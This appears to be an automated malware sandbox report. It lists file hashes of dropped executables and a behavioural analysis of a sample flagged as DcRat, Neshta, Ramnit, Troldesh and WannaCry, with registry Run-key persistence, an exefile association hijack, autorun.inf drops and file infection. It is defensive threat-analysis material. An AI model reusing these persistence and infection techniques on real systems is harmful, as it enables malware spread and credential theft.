memory/2092-1246-0x0000000000400000-0x0000000000433000-memory.dmp
C:\Users\Admin\Documents\@[email protected]
| MD5 | 7e6b6da7c61fcb66f3f30166871def5b |
| SHA1 | 00f699cf9bbc0308f6e101283eca15a7c566d4f9 |
| SHA256 | 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e |
| SHA512 | e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3 |
C:\Windows\directx.sys
| MD5 | 04e857b9e9b719deb8431c056bd36980 |
| SHA1 | 794bee1fbbedfbde3c2b22b9523cc8be5a34dead |
| SHA256 | 02f8a809d260576eb6fd56d16553b2d394a7827c284d5f947a9e617025f72a1e |
| SHA512 | b67bc1ecb2218d00060e7d02aa01e54830e58c4efbe7fb0ac1336da177b270b2421625c7e0f5e3c73e5f74db03e44caacbb19d49d709d30b1e12164bcc83ba63 |
C:\Windows\directx.sys
| MD5 | e08da1f05efb3b6d438640a92d92761c |
| SHA1 | cd8f9ad002181ebf87a3625734498ddc4a50ec59 |
| SHA256 | b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52 |
| SHA512 | e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d |
memory/2880-1465-0x0000000000D50000-0x0000000000DA2000-memory.dmp
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
| MD5 | a4d60b143b5fcc68f86b929d73d1880d |
| SHA1 | 36e946b7d6dd02542e1d893abaa448aff43f1072 |
| SHA256 | 7a55183d372c4645e8a31389d2813fa12c127389254b7412c225ec413c404044 |
| SHA512 | dd9562c3b9d4198d322f7db0d16b4dcdbf6abc6474faf4ed25f1bca88c69614c8dbaf4e51de61c208a7f9c261de3e6f1f530f245640d1315ee22b3b0642945ff |
C:\Windows\directx.sys
| MD5 | f59242b83b85879711e7a8314958ca97 |
| SHA1 | 2e8b8ef476a2c14991b1e04fc2fe8adc5cbfabdb |
| SHA256 | 5891dc17d4f47efa1bf3bcadfc07f152c2ed6a331918a1a3e5c3565a6a18ff92 |
| SHA512 | 5ee8f089b23b3b635c3ff17b1c7baf0102f8d5072e1942f5a60946958017783b8b0f6af8cc7c8838f2e77cdfbc8d820b7d27214bdfbf94b6b720bcfa91e6cc40 |
memory/2020-1476-0x0000000000ED0000-0x0000000001404000-memory.dmp
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@[email protected]
| MD5 | ead26e9ffec1e503914045b35971e09a |
| SHA1 | c607f6fc0c232f82941405eea8fcb94035bc1d67 |
| SHA256 | 5fab33f4bd6b7c0410c82679b11c615d1719978b7ed3a8f589a28acc9b209e2d |
| SHA512 | f5482bbc8d01eb53988ee1f84b0a995373294b036190175e54f18dda070fba04b4138272d7ec7b1f2e919824eaad931a4d1b540c4389f03bde3ccadbdddf5c47 |
C:\Program Files (x86)\Microsoft\DesktopLayer.exe
| MD5 | 47826f2614f1fa90601dc51e40d5c29e |
| SHA1 | e9673510f232869a91280e4c2941f8aa2f8c5108 |
| SHA256 | 947d28e57a71ab35c91b6c3efc01734191ac2a488985f2554aa5b980ee53f8be |
| SHA512 | f7c115b4e8f378d30d83d4fe76771984f9fc9556133ffa8ada8ec52fdfcfe171b3f86be12dfd5a66bd6017551f94f08012e21c7f05d238d51e1fb8843d5db595 |
C:\Windows\directx.sys
| MD5 | 3f80c09d63dcf163cd90af23cacaee53 |
| SHA1 | 5e7c0ac1a26d01052019f9e3a60e2d8a815e1bb9 |
| SHA256 | 0aa1dd5b935f4aafb1a1a087ebf7d1193fe944044688677817cf67738c89b685 |
| SHA512 | 27114198bb096313a03a959034235d6317b190b7cbf88300ca0d41a5da332ea5707223b715a3a4c3cf2b147422c83c38017141a898b4ddd24111170842bebd61 |
memory/1516-1534-0x0000000000400000-0x000000000043D000-memory.dmp
memory/2824-1536-0x0000000000400000-0x000000000042E000-memory.dmp
C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
| MD5 | ff5e1f27193ce51eec318714ef038bef |
| SHA1 | b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6 |
| SHA256 | fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320 |
| SHA512 | c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a |
memory/1540-1592-0x0000000000400000-0x000000000043D000-memory.dmp
memory/2320-1595-0x00000000001B0000-0x00000000001B4000-memory.dmp
memory/2928-1596-0x0000000000400000-0x000000000042E000-memory.dmp
memory/2320-1590-0x00000000002B3000-0x00000000002C3000-memory.dmp
memory/2748-1602-0x0000000000400000-0x0000000000416000-memory.dmp
memory/240-1614-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2876-1654-0x0000000000B70000-0x0000000000C04000-memory.dmp
C:\Users\Admin\Desktop\8.exe
| MD5 | 61b32a82577a7ea823ff7303ab6b4283 |
| SHA1 | 9107c719795fa5768498abb4fed11d907e44d55e |
| SHA256 | 4263eacd358d5ef9efacff1f63ff79487639136c0268938755a4bfe3f5797167 |
| SHA512 | 86ac9d3d0804f5dd3ebe08ab59058363bceeaa3f42d2d482f97ce688837b3b81693fde2b973250b93ee3223318b0f8e4f2faf6b0f91017807feacabce979d700 |
C:\Windows\directx.sys
| MD5 | c93ff55f5c5a9e2323b2f5d677bdbee1 |
| SHA1 | 3e1c36c7d34bafad15e140ce5b03734f6aa87d1d |
| SHA256 | 15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc |
| SHA512 | 8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a |
memory/2844-1856-0x00000000712F0000-0x000000007189B000-memory.dmp
memory/2656-1967-0x000000006846D000-0x0000000068478000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 86f9342b96c7fa7613545602d6132ba4 |
| SHA1 | 7d3033ef56aba51310d92d4d6cda188a4b792a47 |
| SHA256 | d0a2a2e405eca9875394e96c17af5d818657fef62b5b39173e58e8a135502f32 |
| SHA512 | 5e93a6b5ef097c5f1a85b47f121e9596be2eb38f36551dc5bb27ee4be4f3a3417f99995a813a673c2e614b834a9d2e0e76e287612d82eaa9e0a099a3117ca29a |
memory/2324-2008-0x000000006846D000-0x0000000068478000-memory.dmp
C:\ProgramData\system.exe
| MD5 | e817d74d13c658890ff3a4c01ab44c62 |
| SHA1 | bf0b97392e7d56eee0b63dc65efff4db883cb0c7 |
| SHA256 | 2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d |
| SHA512 | 8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815 |
C:\Users\Admin\AppData\Local\Temp\tmp7668.tmp.bat
| MD5 | 26f2b596ad09f70bdab6a51f2d39665f |
| SHA1 | bc5e5a11ed45df29811cb21d8435475071f57f1a |
| SHA256 | 365350a3e777fd47be7e6eee89f17b236d9a47a21023243a173fdd7bdcd28efd |
| SHA512 | e0650b1868e9bd65d7bff7c371655229e1dc1f3d25cf6cf84d5ddc17ad26dcb7d1c133e292c1a29cb0d5b805b54ebcf8f7554591edac21739c13416f57c8cf77 |
memory/2876-2262-0x00000000001D0000-0x00000000001DC000-memory.dmp
memory/2876-2286-0x00000000001F0000-0x00000000001FA000-memory.dmp
memory/2876-2287-0x0000000000200000-0x000000000020C000-memory.dmp
memory/2876-2288-0x0000000000520000-0x000000000052C000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 23624d5bc68d72d1fbd1d869926f6b8c |
| SHA1 | 874dcfbd040f757eef4e3989d16c1b14b1e16620 |
| SHA256 | 70373426b70f7c9d69545a8e1f223e2096aeb835091eb5eee1b852a92abe2ab6 |
| SHA512 | 5e17483656d596914d37c25ac9f97a63610cd03aa2cdf8f59ac2818dcd8ced273fadfe7f228ccd5fe9d928fa29fabe956168c90e55a22262032d6b9d82ec2ffe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 728a9084c02ac93d7ac911aae6f81a5a |
| SHA1 | fc68a8f1cc77ae2f74bb9bab3b85aaaa47021ca3 |
| SHA256 | da436752147196a6db0ee4d385bf13c63fcbb7f2069f93000059bc9e22eb678b |
| SHA512 | 072d940c7e0af26e8d4fd873f76daf9204284b1a83640c1963c67e55afef8dc097901afa78157ea22320d9588a381759bc266ff5b1908f4278d0902d73d5b800 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 219655b6dffcb062fd1388cd238bcf17 |
| SHA1 | 2518c78cdff88e4caab6df779cc2df06d9885cd6 |
| SHA256 | 166dd21b728df59f82f31cea00e7083b3fffb605a0de13e11a962d99f7be12af |
| SHA512 | 8028634c4e8a15ef1d9e8d1dddfdc84f76eb58ec2125c247ecdcea6ac8792524bafe948741bb4918d3cb0e3b58904d12ec7e293977c93d56b138089681dcdd94 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3b38ede308735e70e2783656bd78a5e6 |
| SHA1 | a053746256397d213cc8fe98258bdbe9705abe33 |
| SHA256 | b1c8e5668725dec42c5e0f55e687a33594964dbaf99a3fcbea848047a805911e |
| SHA512 | b765b7e1fb0b6cc94e10a8e993d7509a0f165ca6d497e96791f3e7de210fc4d69d38e413e84895ea0189aadd8add607dda0417fdd2a531353fc18db0cb0967fe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9cdb2916ae772d624dc1f97d15ce12f9 |
| SHA1 | a234f356a32d01f741459b25db4a87ada85ccf4f |
| SHA256 | b36d5c016a5a2a591a32320575f822a7f0ed198cb0b6efc2c810bf5906ede3db |
| SHA512 | 5686e00fd0c47c5f90838b4c9559c9e8bde60e468d05e384558ceedf28539f586704af93400454a0d26f7306026e9dbe17a59f962f2524efac603dd57ae6e058 |
C:\ProgramData\freebl3\system.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d734b923c382ac7b77a1b4fd4951d501 |
| SHA1 | 7607e5c38bee85f9593c7ffa045c61f695370e14 |
| SHA256 | 66b80abb3ebebd6f566467c210b7e8baae816aeebff6e846e52787ceb6d67427 |
| SHA512 | 094acfe9b1c92faddea67a21591405b67570c00c069007b8f87d87218a6ad342180ec3c5d3b24b0e2bcc5c70ff36361ef9ea10862145312645f974263a80fe25 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 93387c2ec4add1e291c0710b885d16cc |
| SHA1 | adf89ebdbcf68a1782265bab164f99b85188743f |
| SHA256 | bc1c70162b9ad1c47181cd533f21841b06655305b5deb3129e92a2ebaabb82a1 |
| SHA512 | bdf8fd97cfbb264063602107f85d55cc55cbd09b6fd735ba087d55d8b9a3be8a87b5fe3844e5c2c1ba48c547ece738ac8c0b4531f4fbcb75c6b3e09325ac4125 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | baeec9297c1d3ce4319273d5d4fcaaf8 |
| SHA1 | 8464cafd1e071dbe1fd4bcc1b631ed12fa676f51 |
| SHA256 | e75ef8c52ac6973fdc38bcfd96585923d986b7afab6240f449f99703bec85c8a |
| SHA512 | 389fa2518e0db9c00676274212a6a499084268189aa1ced3640821a49be1d7670148f71b864408440a5c914492f9a4fcc2f6372abe97c0ccb7d2979e7b1a9ebd |
memory/2020-2686-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 673f60f6b0be4eedb5b09a13aaf2f276 |
| SHA1 | 782d78fb7d7bede0a5b9c2c9ca592558987e2830 |
| SHA256 | 539275b1ecdae910cd8d51c0a58b233927448a807924bbf4a2a2669a12617a3f |
| SHA512 | 7a116ce178f4e5c238f31304a9f36a8b3c4e03f8a076d44869f427b9a103d19e15a1eb2008158cf2ad86d553cedf9133dc029821450ca139741f1046e6de0e17 |
memory/3536-2785-0x0000000000930000-0x0000000000E64000-memory.dmp
C:\Windows\directx.sys
| MD5 | 59c9e2a41f560931ec584bc78d3f2d8d |
| SHA1 | ad2a1b1c986e14a642a2e5660fe3be6948a24e52 |
| SHA256 | e929029d1f12e4fe30a18f1378d98140d3e2a72913d62daf70d4579b76c58ee6 |
| SHA512 | b9e555ef225ddbf5be4fafb9bb31e9b8c8219565afa25ca7ee12f76c006f2be8f959d7bc8ed043d0224d7c2c4cb2fe2877263d924fc9a96340ca00219b59d80d |
C:\Users\Admin\AppData\Roaming\WindowsUpdate.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
memory/740-2815-0x0000000000A45000-0x0000000000A5A000-memory.dmp
memory/740-2816-0x0000000000220000-0x000000000023C000-memory.dmp
memory/740-2817-0x0000000000400000-0x0000000000871000-memory.dmp
memory/3368-2938-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1576-2943-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Users\Public\Desktop\@[email protected]
| MD5 | c17170262312f3be7027bc2ca825bf0c |
| SHA1 | f19eceda82973239a1fdc5826bce7691e5dcb4fb |
| SHA256 | d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa |
| SHA512 | c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c |
C:\Users\Admin\AppData\Local\Temp\jobA4AHzPOmu1yZ_cL\8ghN89CsjOW1Login Data For Account
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\jobA4AHzPOmu1yZ_cL\D87fZN3R3jFeWeb Data
| MD5 | 1f41b636612a51a6b6a30216ebdd03d8 |
| SHA1 | cea0aba5d98bed1a238006a598214637e1837f3b |
| SHA256 | 34e9cb63f4457035e2112ba72a9ea952b990947c9dc8fb7303f4d25735f2c81c |
| SHA512 | 05377e24e0077208a09550b7a35a14c3f96d14013aadee71f377450cb3a13ea70a2b85f6af201e1c9502fc1c33e243b1de09de60313fb5be61bc12f6efe57ca8 |
memory/3536-3005-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jobA4AHzPOmu1yZ_cL\3b6N2Xdh3CYwplaces.sqlite
| MD5 | 727be1698abb145cac6da9e42c798cf7 |
| SHA1 | 83509b6388edbdabb5b6e76eb004a978825b7c3d |
| SHA256 | eff09705e66c1a2c818b93e2f6606b8408b5d872bba8235497a56649f2dfe965 |
| SHA512 | 76b46096d46740853594abf199ccbc64fefd87f4b7cb461346c6e3b9ee7e9b4db7fd21f2086e8152b0ef1ef8aa75e9e200e115dfc5ed538820a526a86dce127f |
C:\Users\Admin\AppData\Local\Temp\jobA3AHzPOmu1yZ_cL\information.txt
| MD5 | d799e9102067d4ec5946de4a25f72898 |
| SHA1 | a9356b1f7c6ba7276fcddb88f244a11e21d1e9c1 |
| SHA256 | 5ab6a522312504e8d8c56419b55bebcb8cbd21011a1babf3029f17cbea1062ad |
| SHA512 | ec10cbbcc42580263a0d4cb0d5506b7229b790ee5fb10947f88381d46930b4a5eb00c0d51604adb85c46cae7673feaa08f69a957854b1647807336e4bdf00917 |
memory/3028-3038-0x00000000010B0000-0x00000000015C6000-memory.dmp
memory/3156-3043-0x00000000002D2000-0x00000000002E2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-09 22:08
Reported
2024-01-09 22:50
Platform
win10-20231215-en
Max time kernel
76s
Max time network
130s
Command Line
Signatures
DcRat
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Neshta
Ramnit
Troldesh, Shade, Encoder.858
Wannacry
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Contacts a large (1100) amount of remote hosts
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4204 set thread context of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmprph.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\WinMail.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File created | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\setup_wm.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmpconfig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\px8A97.tmp | C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmpconfig.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\WinMail.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmpshare.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\px8D66.tmp | C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\Windows\csrss.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmpshare.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
